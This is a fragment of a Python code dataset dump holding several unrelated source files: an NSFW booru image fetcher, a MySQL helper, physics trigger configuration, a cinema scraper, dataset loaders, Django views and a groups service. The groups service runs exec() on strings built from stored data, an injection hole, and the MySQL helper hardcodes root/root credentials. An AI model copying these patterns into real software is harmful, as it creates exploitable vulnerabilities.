tuple:\n \"\"\"\n Parse the post list to return the file url and its tags.\n :param post_list: the post list.\n :param url_formatter: a callable to get the file url.\n :param tag_key: the key to get the tag string.\n :return: a tuple of (file url, list of tags)\n \"\"\"\n post = choice(post_list)\n file_url = url_formatter(post)\n return file_url, post[tag_key].split(' ')\n\n\ndef __retry_search(\n site: str, safe_queries: List[str],\n unsafe_queries: List[str], tag_matcher: TagMatcher) -> list:\n \"\"\"\n Generate tags to retry the search if no results were found.\n :param site: the site name.\n :param safe_queries: the search tags that are in the db.\n :param unsafe_queries: the search tags that are not in the db.\n :param tag_matcher: the TagMatcher object.\n :return: a list of tags that are either in the db or matched with one in\n the db.\n \"\"\"\n retry = safe_queries[:]\n for unsafe in unsafe_queries:\n match = tag_matcher.match_tag(site, unsafe)\n if match:\n retry.append(match)\n return retry\n\n\ndef __get_site_params(\n site: str, api_key: Optional[str], user: Optional[str]) -> tuple:\n \"\"\"\n Get function call parameters for a site.\n :param site: the site name.\n :param api_key: the danbooru api key, not required for other sites.\n :param user: the danbooru username, not required for other sites.\n :return: the request url, the file url formatter, the key for the tag string\n \"\"\"\n request_url = {\n 'danbooru': f'https://danbooru.donmai.us//posts.json?login='\n f'{user}&api_key={api_key}&limit=1&random=true&tags=',\n 'konachan': 'https://konachan.com//post.json?tags=',\n 'yandere': 'https://yande.re//post.json?tags=',\n 'e621': 'https://e621.net/post/index.json?&tags=',\n 'gelbooru': 'https://gelbooru.com//index.php?'\n 'page=dapi&s=post&q=index&tags='\n }[site]\n url_formatter = {\n 'danbooru': lambda x: 'https://danbooru.donmai.us' + x['file_url'],\n 'konachan': lambda x: 'https:' + x['file_url'],\n 'yandere': lambda x: x['file_url'],\n 'e621': lambda x: x['file_url'],\n 'gelbooru': lambda x: 'https:' + x['@file_url']\n }[site]\n tag_key = {\n 'danbooru': 'tag_string',\n 'konachan': 'tags',\n 'yandere': 'tags',\n 'e621': 'tags',\n 'gelbooru': '@tags'\n }[site]\n return request_url, url_formatter, tag_key\n\n\nasync def __get_lewd(\n tags: Optional[list], rating: Optional[str], site: str, site_params,\n tag_matcher: TagMatcher, session: ClientSession = None,\n limit=0, fuzzy=False) -> tuple:\n \"\"\"\n Get lewds from a site.\n :param tags: the search tags.\n :param rating: the rating of the search.\n :param site: the site name.\n :param site_params: the function call parameters for the site.\n :param tag_matcher: the TagMatcher object.\n :param session: the aiohttp ClientSesson.\n :param limit: maximum recursion depth\n :param fuzzy: whether the search was fuzzy or not.\n :return: a tuple of\n (file url, tags used in the search, fuzzy, tags to write to the db)\n \"\"\"\n assert session or site == 'gelbooru'\n if limit > 2:\n return (None,) * 4\n url, url_formatter, tag_key = site_params\n res, safe_queries, unsafe_queries = await __request_lewd(\n tags, rating, url, site, session, tag_matcher)\n post_list = await __parse_result(res, site)\n if post_list:\n file_url, tags_to_write = __parse_post_list(post_list, url_formatter,\n tag_key)\n return file_url, safe_queries + unsafe_queries, fuzzy, tags_to_write\n retry = __retry_search(site, safe_queries, unsafe_queries, tag_matcher)\n if retry:\n return await __get_lewd(\n retry, rating, site, site_params,\n tag_matcher, session, limit + 1, True\n )\n return (None,) * 4\n\n\nasync def get_lewd(\n site: str, search_query: tuple, localize: dict,\n tag_matcher: TagMatcher, user=None, api_key=None) -> tuple:\n \"\"\"\n Get lewd picture you fucking perverts.\n :param site: the site name.\n :param search_query: the search query.\n :param localize: the localization strings.\n :param tag_matcher: the TagMatcher object.\n :param user: the danbooru username, not required for other sites.\n :param api_key: the danbooru api key, not required for other sites.\n :return: a tuple of\n (the message with the file url to send, a list of tags to write to the db)\n \"\"\"\n assert site in ('danbooru', 'konachan', 'yandere', 'e621', 'gelbooru')\n assert (user and api_key) or site != 'danbooru'\n tags, rating = __parse_query(search_query)\n site_params = __get_site_params(site, api_key, user)\n\n session = ClientSession() if site != 'gelbooru' else None\n try:\n file_url, searched_tags, fuzzy, tags_to_write = await __get_lewd(\n tags, rating, site, site_params, tag_matcher, session)\n if session is not None:\n session.close()\n if file_url:\n msg = file_url\n if fuzzy:\n msg = localize['nsfw_fuzzy'].format(\n site.title(), ', '.join(searched_tags)) + file_url\n elif not search_query:\n msg = localize['random_nsfw'] + '\\n' + file_url\n return msg, tags_to_write\n else:\n return localize['nsfw_sorry'], None\n except ClientResponseError:\n return localize['api_error'].format(site.title()), None\n\n\nasync def greenteaneko(localize):\n \"\"\"\n Get a random green tea neko comic\n :param localize: the localization strings\n :return: the green tea neko comic\n \"\"\"\n url = 'https://rra.ram.moe/i/r?type=nsfw-gtn&nsfw=true'\n try:\n res = await aiohttp_get(url, ClientSession(), True)\n js = await res.json()\n return 'https://rra.ram.moe{}\\n{}'.format(\n js['path'], localize['gtn_artist'])\n except ClientResponseError:\n return localize['api_error'].format('rra.ram.moe')\n","sub_path":"core/nsfw_core.py","file_name":"nsfw_core.py","file_ext":"py","file_size_in_byte":9598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"621840617","text":"from datetime import datetime, timedelta\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport json\nimport serviceNowRetriever as retriever\n\n# init\n\n# connect to the its own database\nDB_NAME = 'mondb'\ndbConfig = {'user': 'root',\n 'password': 'root',\n 'host': '127.0.0.1',\n 'database': DB_NAME}\nTABLES = {'crn': (\n \"CREATE TABLE `crn` (\"\n \" `ID` int NOT NULL AUTO_INCREMENT,\"\n \" `cr_number` varchar(50) NOT NULL,\"\n \" `start_date` DATETIME NOT NULL,\"\n \" `end_date` DATETIME NOT NULL,\"\n \" `req_created_on` DATETIME NOT NULL,\"\n \" `affected_CIs` varchar(20000) NOT NULL,\"\n \" `CIs_updated_on` DATETIME NOT NULL,\"\n \" `status` varchar(10) NOT NULL,\"\n \" PRIMARY KEY (`ID`), UNIQUE KEY `cr_number` (`cr_number`)\"\n \") ENGINE=InnoDB\")}\n\n\nclass SqlPython(object):\n cnx = None\n cursor = None\n isBusy = False\n\n def __init__(self):\n self.connect_sql()\n\n def connect_sql(self):\n try:\n print(\"connecting to database\")\n self.cnx = mysql.connector.connect(**dbConfig)\n self.cursor = self.cnx.cursor()\n print(\"setting up cursor\")\n except mysql.connector.Error as e:\n if e.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif e.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(e)\n return 1\n return 0\n\n def create_table(self, tables):\n for name, ddl in tables.items():\n try:\n print(\"Creating table {}: \".format(name), end='')\n self.cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n def create_db(self, db):\n try:\n self.cnx.database = db\n print(\"find database\")\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n try:\n self.cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Failed creating database: {}\".format(err))\n self.cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\n def insert_table(self, target, target_data):\n self.isBusy = True\n print(\"Inserting\")\n self.cursor.execute(target, target_data)\n self.cnx.commit()\n self.isBusy = False\n\n def stop_sql(self):\n self.cursor.close()\n self.cnx.close()\n\n # query cis' lastest updated time\n def query_cis_updated_on(self, cr_num):\n self.isBusy = True\n query = (\"SELECT CIs_updated_on FROM crn \"\n \"WHERE cr_number=%s\")\n try:\n self.cursor.execute(query, (cr_num,))\n except mysql.connector.Error as err:\n print(\"Query CIs for {}: {}\".format(cr_num, err))\n self.isBusy = False\n return self.cursor.fetchone()[0]\n\n # update cis list if applicable\n def update_cis_updated_on(self, new_cis, cr_num, new_cis_updated_on):\n self.isBusy = True\n query = (\"UPDATE crn \"\n \"SET affected_CIs=%s, CIs_updated_on=%s\"\n \"WHERE cr_number=%s\")\n try:\n # print(type(new_cis_updated_on))\n self.cursor.execute(query, (json.dumps(new_cis), new_cis_updated_on, cr_num))\n self.cnx.commit()\n except mysql.connector.Error as err:\n print(\"Failed updating CIs for {}: {}\".format(cr_num, err))\n self.isBusy = False\n\n # get list of device that has actions in a period of time\n def query_within(self, duration):\n query = (\"SELECT * FROM crn \"\n \"WHERE (status=0 AND start_date between %s and %s)\"\n \"OR (status=3 AND end_date between %s and %s)\")\n try:\n self.cursor.execute(query, (datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n (datetime.now() + timedelta(hours=duration)).strftime('%Y-%m-%d %H:%M:%S'),\n datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n (datetime.now() + timedelta(hours=duration)).strftime('%Y-%m-%d %H:%M:%S')))\n except mysql.connector.Error as err:\n print(\"Query msg {}\".format(err))\n list_query_list = self.cursor.fetchall()\n if list_query_list is None:\n return None\n result_list = []\n for item in list_query_list:\n result_list.append(list(item))\n # if list_query_list:\n # self.update_status(list_query_list, 1)\n return result_list\n\n # update the status for each change request\n def update_status(self, req_num, status_code):\n query = (\"UPDATE mondb.crn \"\n \"SET status=%s \"\n \"where cr_number=%s\")\n try:\n self.cursor.execute(query, (status_code, req_num))\n self.cnx.commit()\n except mysql.connector.Error as err:\n print(\"Failed updating status for {}: {}\".format(req_num, err))\n\n # status: {0: in the queue, 1: scheduled, 2: under maintenance, 3: done}\n def update_db(self):\n self.isBusy = True\n add_cr = (\"INSERT INTO crn \"\n \"(cr_number, start_date, end_date, req_created_on, affected_CIs, CIs_updated_on, status) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s)\")\n req = retriever.get_req_list()\n for item in req:\n data_cr = (item['cr_number'], item['start_date'], item['end_date'], item['req_created_on'],\n json.dumps(item['affected_CIs']), item['CIs_updated_on'], 0)\n try:\n self.insert_table(add_cr, data_cr)\n except mysql.connector.Error as err:\n print(\"Error!\")\n if err.errno == errorcode.ER_DUP_ENTRY:\n if self.query_cis_updated_on(item['cr_number']) == item['CIs_updated_on']:\n print(\"CIs have not changed. Skipping...\")\n self.update_cis_updated_on(item['affected_CIs'], item['cr_number'], item['CIs_updated_on'])\n else:\n print(\"CIs for {} has changed, updating...\".format(item['cr_number']))\n self.update_cis_updated_on(item['affected_CIs'], item['cr_number'], item['CIs_updated_on'])\n self.isBusy = False\n\n\nif __name__ == \"__main__\":\n s = SqlPython()\n # s.connect_sql()\n # TABLES = {'crn': (\n # \"CREATE TABLE `crn` (\"\n # \" `ID` int NOT NULL AUTO_INCREMENT,\"\n # \" `cr_number` varchar(50) NOT NULL,\"\n # \" `start_date` DATETIME NOT NULL,\"\n # \" `end_date` DATETIME NOT NULL,\"\n # \" `req_created_on` DATETIME NOT NULL,\"\n # \" `affected_CIs` varchar(20000) NOT NULL,\"\n # \" `CIs_updated_on` DATETIME NOT NULL,\"\n # \" `status` varchar(10) NOT NULL,\"\n # \" PRIMARY KEY (`ID`), UNIQUE KEY `cr_number` (`cr_number`)\"\n # \") ENGINE=InnoDB\")}\n # s.create_table(TABLES)\n\n # print(datetime.now() - timedelta(hours=28))\n # s_time = datetime.fromtimestamp(float(datetime.now() - timedelta(hours=28))).strftime('%Y-%m-%d %H:%M:%S')\n # e_time = datetime.fromtimestamp(float(datetime.now() - timedelta(hours=8))).strftime('%Y-%m-%d %H:%M:%S')\n # s.update_sql()\n # add_cr = (\"INSERT INTO crn \"\n # \"(cr_number, start_date, end_date, req_created_on, affected_CIs, CIs_updated_on, status ) \"\n # \"VALUES (%s, %s, %s, %s, %s, %s, %s)\")\n # req = retriever.get_req_list()\n # for item in req:\n # data_cr = (item['cr_number'], item['start_date'], item['end_date'], item['req_created_on'],\n # json.dumps(item['affected_CIs']), item['CIs_updated_on'], 2)\n # s.insert_table(add_cr, data_cr)\n # s_time = (datetime.now() - timedelta(hours=28)).strftime('%Y-%m-%d %H:%M:%S')\n # e_time = (datetime.now() - timedelta(hours=8)).strftime('%Y-%m-%d %H:%M:%S')\n # print(s_time)\n # s.update_cis_updated_on(['123', '315'], 'CHG0085579', datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n l = s.query_cis_updated_on('CHG0091248')\n\n print(l)\n","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":8572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"457880311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# @file Inclusive.py\n# @author Albert Puig (albert.puig@cern.ch)\n# @date 14.04.2015\n# =============================================================================\n\"\"\"Inclusive B->hhgamma and B->hhhgamma lines.\"\"\"\n\n\nfrom RadiativeLineBuilder import RadiativeLineBuilder\n\n\nclass RadiativeInclusiveLines(RadiativeLineBuilder):\n @staticmethod\n def get_stages(props):\n from Stages import TrackGEC, TopoCombiner\n from HltTracking.HltPVs import PV3D\n from Hlt2Lines.Topo.Lines import TopoLines\n from Hlt2Lines.Topo.Stages import FilterMVA\n from Hlt2Lines.Utilities.Hlt2Stage import Hlt2ExternalStage\n\n # Load external stages\n topo_lines = TopoLines()\n two_body = Hlt2ExternalStage(topo_lines, topo_lines.stages(props['HHCombiner'])[0])\n three_body = Hlt2ExternalStage(topo_lines, topo_lines.stages(props['HHHCombiner'])[0])\n\n # Add the photon\n two_body_plus_photon = TopoCombiner('HHGammaCombo', 2, two_body)\n two_body_plus_ee = TopoCombiner('HHGammaComboEE', 2, two_body, True)\n three_body_plus_photon = TopoCombiner('HHHGammaCombo', 3, three_body)\n three_body_plus_ee = TopoCombiner('HHHGammaComboEE', 3, three_body, True)\n\n # Filter BDTs\n filtered_two_plus_one = FilterMVA(21,\n [two_body_plus_photon],\n props['HHGammaBBDT'],\n nickname='HHGammaBBDT',\n preambulo=['from LoKiCore.math import log10'])\n filtered_two_plus_ee = FilterMVA(22,\n [two_body_plus_ee],\n props['HHGammaEEBBDT'],\n nickname='HHGammaEEBBDT')\n filtered_three_plus_one = FilterMVA(31,\n [three_body_plus_photon],\n props['HHHGammaBBDT'],\n nickname='HHHGammaBBDT',\n preambulo=['from LoKiCore.math import log10'])\n filtered_three_plus_ee = FilterMVA(32,\n [three_body_plus_ee],\n props['HHHGammaEEBBDT'],\n nickname='HHHGammaEEBBDT')\n # Build stages\n return {'RadiativeIncHHGamma' : [TrackGEC(), PV3D('Hlt2'), filtered_two_plus_one],\n 'RadiativeIncHHHGamma' : [TrackGEC(), PV3D('Hlt2'), filtered_three_plus_one],\n 'RadiativeIncHHGammaEE' : [TrackGEC(), PV3D('Hlt2'), filtered_two_plus_ee],\n 'RadiativeIncHHHGammaEE': [TrackGEC(), PV3D('Hlt2'), filtered_three_plus_ee]}\n\n @staticmethod\n def get_cuts():\n from GaudiKernel.SystemOfUnits import MeV\n comb_cuts = {'APT_MIN' : 2000*MeV,\n 'VCHI2PDOF_MAX' : 1000,\n 'VDCHI2_MIN' : 0,\n 'ETA_MIN' : 2,\n 'ETA_MAX' : 5,\n 'CORRM_MIN' : 1000*MeV,\n 'CORRM_MAX' : 10000*MeV,\n 'DIRA_MIN' : 0}\n return {'HHCombiner': 'Topo2BodyCombos',\n 'HHGammaCombo': comb_cuts,\n 'HHGammaBBDT': {'BDT_PARAMS': 'Hlt2_RadiativeInc_2plus1_BDTParams_v1r0.txt',\n 'BDT_VARMAP': {'sv_ipchi2' : 'log10(BPVIPCHI2())',\n 'sv_children_pt_sum': '(CHILD(1, PT) + CHILD(2, PT))/MeV',\n 'gamma_pt' : 'CHILD(2, PT)/MeV',\n 'nbody_fdchi2' : 'log10(BPVVDCHI2)',\n 'sv_vtx_chi2' : 'log10(VFASPF(VCHI2))'},\n 'BDT_MIN': 10.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV},\n 'HHGammaComboEE': comb_cuts,\n 'HHGammaEEBBDT': {'BDT_PARAMS': 'hlt2_topo_run2_v1.bbdt',\n 'BDT_VARMAP': {'n' : \"NINTREE((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma'))\",\n 'mcor' : \"BPVCORRM\",\n 'chi2' : \"VFASPF(VCHI2)\",\n 'sumpt' : \"SUMTREE(PT, ((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), 0.0)/MeV\",\n 'eta' : \"BPVETA\",\n 'fdchi2' : \"BPVVDCHI2\",\n 'minpt' : \"MINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), PT)/MeV\",\n 'nlt16' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (BPVIPCHI2() < 16))\",\n 'ipchi2' : \"BPVIPCHI2()\",\n 'n1trk' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (PT > 1*GeV) & (BPVIPCHI2() > 16))\"},\n 'BDT_MIN': 0.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV},\n 'HHHCombiner': 'Topo3BodyCombos',\n 'HHHGammaCombo': comb_cuts,\n 'HHHGammaBBDT': {'BDT_PARAMS': 'Hlt2_RadiativeInc_3plus1_BDTParams_v1r0.txt',\n 'BDT_VARMAP': {'nbody_doca_max' : 'log10(BPVIPCHI2())',\n 'sv_children_pt_sum': '(CHILD(1, PT) + CHILD(2, PT))*MeV',\n 'gamma_pt' : 'CHILD(2, PT)*MeV',\n 'nbody_fdchi2' : 'log10(BPVVDCHI2)',\n 'sv_vtx_chi2' : 'log10(VFASPF(VCHI2))'},\n 'BDT_MIN': 0.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV},\n 'HHHGammaComboEE': comb_cuts,\n 'HHHGammaEEBBDT': {'BDT_PARAMS': 'hlt2_topo_run2_v1.bbdt',\n 'BDT_VARMAP': {'n' : \"NINTREE((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma'))\",\n 'mcor' : \"BPVCORRM\",\n 'chi2' : \"VFASPF(VCHI2)\",\n 'sumpt' : \"SUMTREE(PT, ((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), 0.0)/MeV\",\n 'eta' : \"BPVETA\",\n 'fdchi2' : \"BPVVDCHI2\",\n 'minpt' : \"MINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), PT)/MeV\",\n 'nlt16' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (BPVIPCHI2() < 16))\",\n 'ipchi2' : \"BPVIPCHI2()\",\n 'n1trk' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (PT > 1*GeV) & (BPVIPCHI2() > 16))\"},\n 'BDT_MIN': 0.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV}}\n\n @staticmethod\n def get_hlt1():\n hlt1 = {}\n for line in ['RadiativeIncHHGamma', 'RadiativeIncHHHGamma', 'RadiativeIncHHGammaEE', 'RadiativeIncHHHGammaEE']:\n hlt1[line] = \"HLT_PASS_RE('Hlt1(Two)?TrackMVADecision')\"\n return hlt1\n\n @staticmethod\n def get_l0():\n l0 = {}\n for line in ['RadiativeIncHHGamma', 'RadiativeIncHHHGamma']:\n l0[line] = \"(L0_CHANNEL('Electron') | L0_CHANNEL('Photon'))\"\n return l0\n\n# EOF\n","sub_path":"Hlt/Hlt/Hlt2Lines/python/Hlt2Lines/Radiative/Inclusive.py","file_name":"Inclusive.py","file_ext":"py","file_size_in_byte":8429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"529425346","text":"from lxml import etree\nfrom io import StringIO, BytesIO\nimport requests\nimport sys\nfrom datetime import datetime\n\nclass Showing(object):\n def __init__(self, title, time):\n self.title = title\n self.time = time\n\ndef getDates():\n today = datetime.today()\n thisMonth = [today.month, today.year]\n def nextMonth(month):\n if month == 12:\n return [month + 1, today.year + 1]\n else:\n return [month + 1, today.year]\n return [thisMonth, nextMonth(today.month)]\n\ndef buildUri(month):\n baseUri = 'http://hollywoodtheatre.org/wp-admin/admin-ajax.php?action=aec_ajax&aec_type=widget&aec_widget_id=aec_widget-5-container'\n monthArg = '&aec_month=' + str(month[0])\n yearArg = '&aec_year=' + str(month[1])\n uri = baseUri + monthArg + yearArg\n return uri\n\ndef makeRequest(uri):\n page = requests.get(uri)\n parser = etree.HTMLParser()\n tree = etree.parse(StringIO(page.text), parser)\n days = tree.xpath('//div[@class=\\'aec-event-info\\']')\n return days\n\ndef parseHtml(days):\n for day in days:\n date = day.xpath('h2[@class=\\'widgettitle\\']/text()')[0]\n date = date.replace(\"Showing \", \"\")\n date = datetime.strptime(date, '%B %d, %Y')\n films = day.xpath('.//li[@class=\\'aec-tooltip-feed-agile\\']')\n\n for film in films:\n film = film.xpath('p/strong/text()')[0]\n film = film.split(' | ')\n title = film[0]\n times = film[1]\n times = times.split()\n\n for time in times:\n time = datetime.strptime(time, '%I:%M%p')\n time = date.replace(hour=time.hour, minute=time.minute)\n showing = Showing(title, time)\n print (showing.title, showing.time)\n\ndef main():\n months = getDates()\n thisMonthUri = buildUri(months[0])\n nextMonthUri = buildUri(months[1])\n thisMonthResponse = makeRequest(thisMonthUri)\n nextMonthResponse = makeRequest(nextMonthUri)\n responses = thisMonthResponse + nextMonthResponse\n output = parseHtml(responses)\n\nmain()\n","sub_path":"hollywood-scraper.py","file_name":"hollywood-scraper.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"207163294","text":"import logging\nimport random\nfrom typing import List, Tuple\n\nimport stanza\nfrom stanza import Document\n\nfrom data_processing.class_defs import SquadExample, QAExample\nfrom data_processing.parse import read_squad_dataset, read_qa_dataset\nfrom defs import SQUAD_DEV, SQUAD_TRAIN, MEDQUAD_TRAIN, MEDQUAD_DEV, MEDQA_HANDMADE_FILEPATH\n\n\nclass NQGDataset:\n class Answer:\n\n def __init__(self, start_index, nb_words, text):\n super(NQGDataset.Answer, self).__init__()\n self.start_index = start_index\n self.nb_words = nb_words\n self.text = text\n\n def __init__(self, dataset_name=\"squad\", mode=\"train\", data_limit=-1):\n super(NQGDataset, self).__init__()\n stanza.download('en')\n self.nlp = stanza.Pipeline('en', processors='tokenize,pos,ner')\n self.datatype = QAExample\n if dataset_name == \"squad\":\n self.datatype = SquadExample\n if mode == \"train\":\n datapath = SQUAD_TRAIN\n elif mode == \"dev\":\n datapath = SQUAD_DEV\n else:\n raise ValueError()\n self.ds = read_squad_dataset(\n datapath,\n limit=data_limit\n )\n elif dataset_name == \"medquad\":\n if mode == \"train\":\n datapath = MEDQUAD_TRAIN\n elif mode == \"dev\":\n datapath = MEDQUAD_DEV\n else:\n raise ValueError()\n self.ds = read_qa_dataset(datapath, limit=data_limit)\n elif dataset_name == \"medqa_handmade\":\n if mode == \"test\":\n datapath = MEDQA_HANDMADE_FILEPATH\n else:\n raise ValueError()\n self.ds = read_qa_dataset(datapath, limit=data_limit)\n else:\n raise NotImplementedError()\n\n def get_dataset(self) -> Tuple[List[Document], List[Answer], List[str]]:\n contexts = []\n answers = []\n questions = []\n issues = 0\n for example in self.ds:\n if self.datatype == SquadExample:\n analyzed = self.nlp(example.context)\n answer = example.answer\n start_index = None\n end_index = None\n for i, word in enumerate(analyzed.iter_words()):\n if start_index is None and word.text == answer.text[:len(word.text)]:\n start_index = i\n if start_index is not None and word.text == answer.text[-len(word.text):]:\n end_index = i\n if (start_index is None) or (end_index is None):\n issues += 1\n logging.warning(f\"Issue while parsing answer '{answer.text}'\")\n continue\n answers.append(NQGDataset.Answer(\n start_index,\n end_index - start_index + 1,\n text=answer.text\n ))\n else:\n analyzed = self.nlp(example.answer.text)\n answers.append(NQGDataset.Answer(\n start_index=example.answer.answer_start,\n nb_words=analyzed.num_tokens,\n text=example.answer.text\n ))\n contexts.append(analyzed)\n questions.append(example.question.question.lower())\n logging.info(f\"Issues: {issues}\")\n return contexts, answers, questions\n\n def get_split(self, first_part_size_ratio: float):\n \"\"\"\n :param first_part_size_ratio: Size ratio of the first returned dataset from the original one.\n :return: A tuple (ds1, ds2) where ds1 is `first_part_size_ratio` of the original dataset\n and ds2 the rest of it.\n \"\"\"\n c, a, q = self.get_dataset()\n ds = list(zip(c, a, q))\n random.shuffle(ds)\n c, a, q = zip(*ds)\n ds_size = len(c)\n first_part_size = int(first_part_size_ratio * ds_size)\n return c[:first_part_size], a[:first_part_size], q[:first_part_size], c[first_part_size:], a[first_part_size:],\\\n q[first_part_size:]\n","sub_path":"data_processing/nqg_dataset.py","file_name":"nqg_dataset.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"390889765","text":"from datetime import date\nfrom rest_framework.response import Response\n\nfrom apps.users.models import User\n# # 获取今天date\n# today = date.today\n# # 过滤查询\n# count = User.objects.filter(last_login_gte=today).count()\n\n\n# 代码应该写入类视图\nfrom rest_framework.views import APIView\n\n\nclass UserActiveAPIView(APIView):\n def get(self, request):\n # 获取今天date\n today = date.today()\n # 过滤查询\n count = User.objects.filter(last_login__gte=today).count()\n return Response({'count': count})\n\n\n# 下单用户\nclass UserOrderAPIView(APIView):\n def get(self, request):\n today = date.today()\n count = User.objects.filter(orderinfo__create_time__gte=today)\n return Response({'count': count})\n\n\n\"\"\"\n1 返回的数据形式\n2 我们先获取今天的日期,在获取三十天之前的日期进行遍历.\n\"\"\"\nfrom datetime import timedelta\n\n\nclass UserMonthAPiView(APIView):\n def get(self, request):\n today = date.today()\n befor_date = today - timedelta(days=30)\n data_list = []\n for i in range(0, 30):\n start_date = befor_date + timedelta(days=i)\n end_date =befor_date + timedelta(days=(i + 1))\n count = User.objects.filter(date_joined__gte=start_date, date_joined__gt=end_date).count()\n data_list.append({\n 'count': count,\n 'date': start_date\n })\n return Response(data_list)\n","sub_path":"meiduo_mall/apps/meiduo_admin/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172604521","text":"\n\nfrom xai.brain.wordbase.nouns._chock import _CHOCK\n\n#calss header\nclass _CHOCKED(_CHOCK, ):\n\tdef __init__(self,): \n\t\t_CHOCK.__init__(self)\n\t\tself.name = \"CHOCKED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"chock\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_chocked.py","file_name":"_chocked.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"434789638","text":"from pupilpermissions.data.groups import Groups\nfrom pupilpermissions.data.dbsession import DbSessionFactory\nfrom pupilpermissions.services.logging_service import LoggingService\n\n\nclass GroupsService():\n @staticmethod\n def list_all_attributes() -> list:\n return ['id', 'group_name', 'group_desc']\n\n @staticmethod\n def get_all_groups():\n session = DbSessionFactory.create_session()\n groups_output_list = []\n for group in session.query(Groups).all():\n current_group_dict={}\n for attribute in GroupsService.list_all_attributes():\n current_group_dict[attribute] = eval('group.' + attribute)\n groups_output_list.append(current_group_dict)\n session.close()\n return groups_output_list\n\n @staticmethod\n def get_group_names():\n session = DbSessionFactory.create_session()\n groups_output_dict={}\n for group in session.query(Groups).all():\n groups_output_dict[group.id] = group.group_name\n session.close()\n return groups_output_dict\n\n @staticmethod\n def get_single_group_info(group_id) -> dict:\n session = DbSessionFactory.create_session()\n attributes = GroupsService.list_all_attributes()\n group_info_return = {}\n group_info = session.query(Groups).get(group_id)\n for attribute in attributes:\n group_info_return[attribute] = eval('group_info.' + attribute)\n session.close()\n return group_info_return\n\n @staticmethod\n def store_group_info(group_to_store):\n attributes = GroupsService.list_all_attributes()\n session = DbSessionFactory.create_session()\n group_to_be_stored = session.query(Groups).get(group_to_store['id'])\n for attribute in attributes:\n exec(\"group_to_be_stored.\" + attribute + \"='\" + group_to_store[attribute] + \"'\")\n session.commit()\n LoggingService.add_entry(group_to_store, 'group', 'store')\n session.close()\n return\n\n @staticmethod\n def delete_group(group_id):\n session = DbSessionFactory.create_session()\n session.query(Groups).filter(Groups.id == group_id).delete()\n session.commit()\n deleted_group = {'id': group_id}\n LoggingService.add_entry(deleted_group, 'group', 'delete')\n session.close()\n return\n\n @staticmethod\n def create_new_group(group_info):\n session = DbSessionFactory.create_session()\n group_to_store = Groups()\n for key in group_info.keys():\n exec(\"group_to_store.\" + key + \"='\" + group_info[key] + \"'\")\n session.add(group_to_store)\n session.commit()\n LoggingService.add_entry(group_info, 'group', 'create')\n session.close()\n return\n\n","sub_path":"pupilpermissions/services/groups_service.py","file_name":"groups_service.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
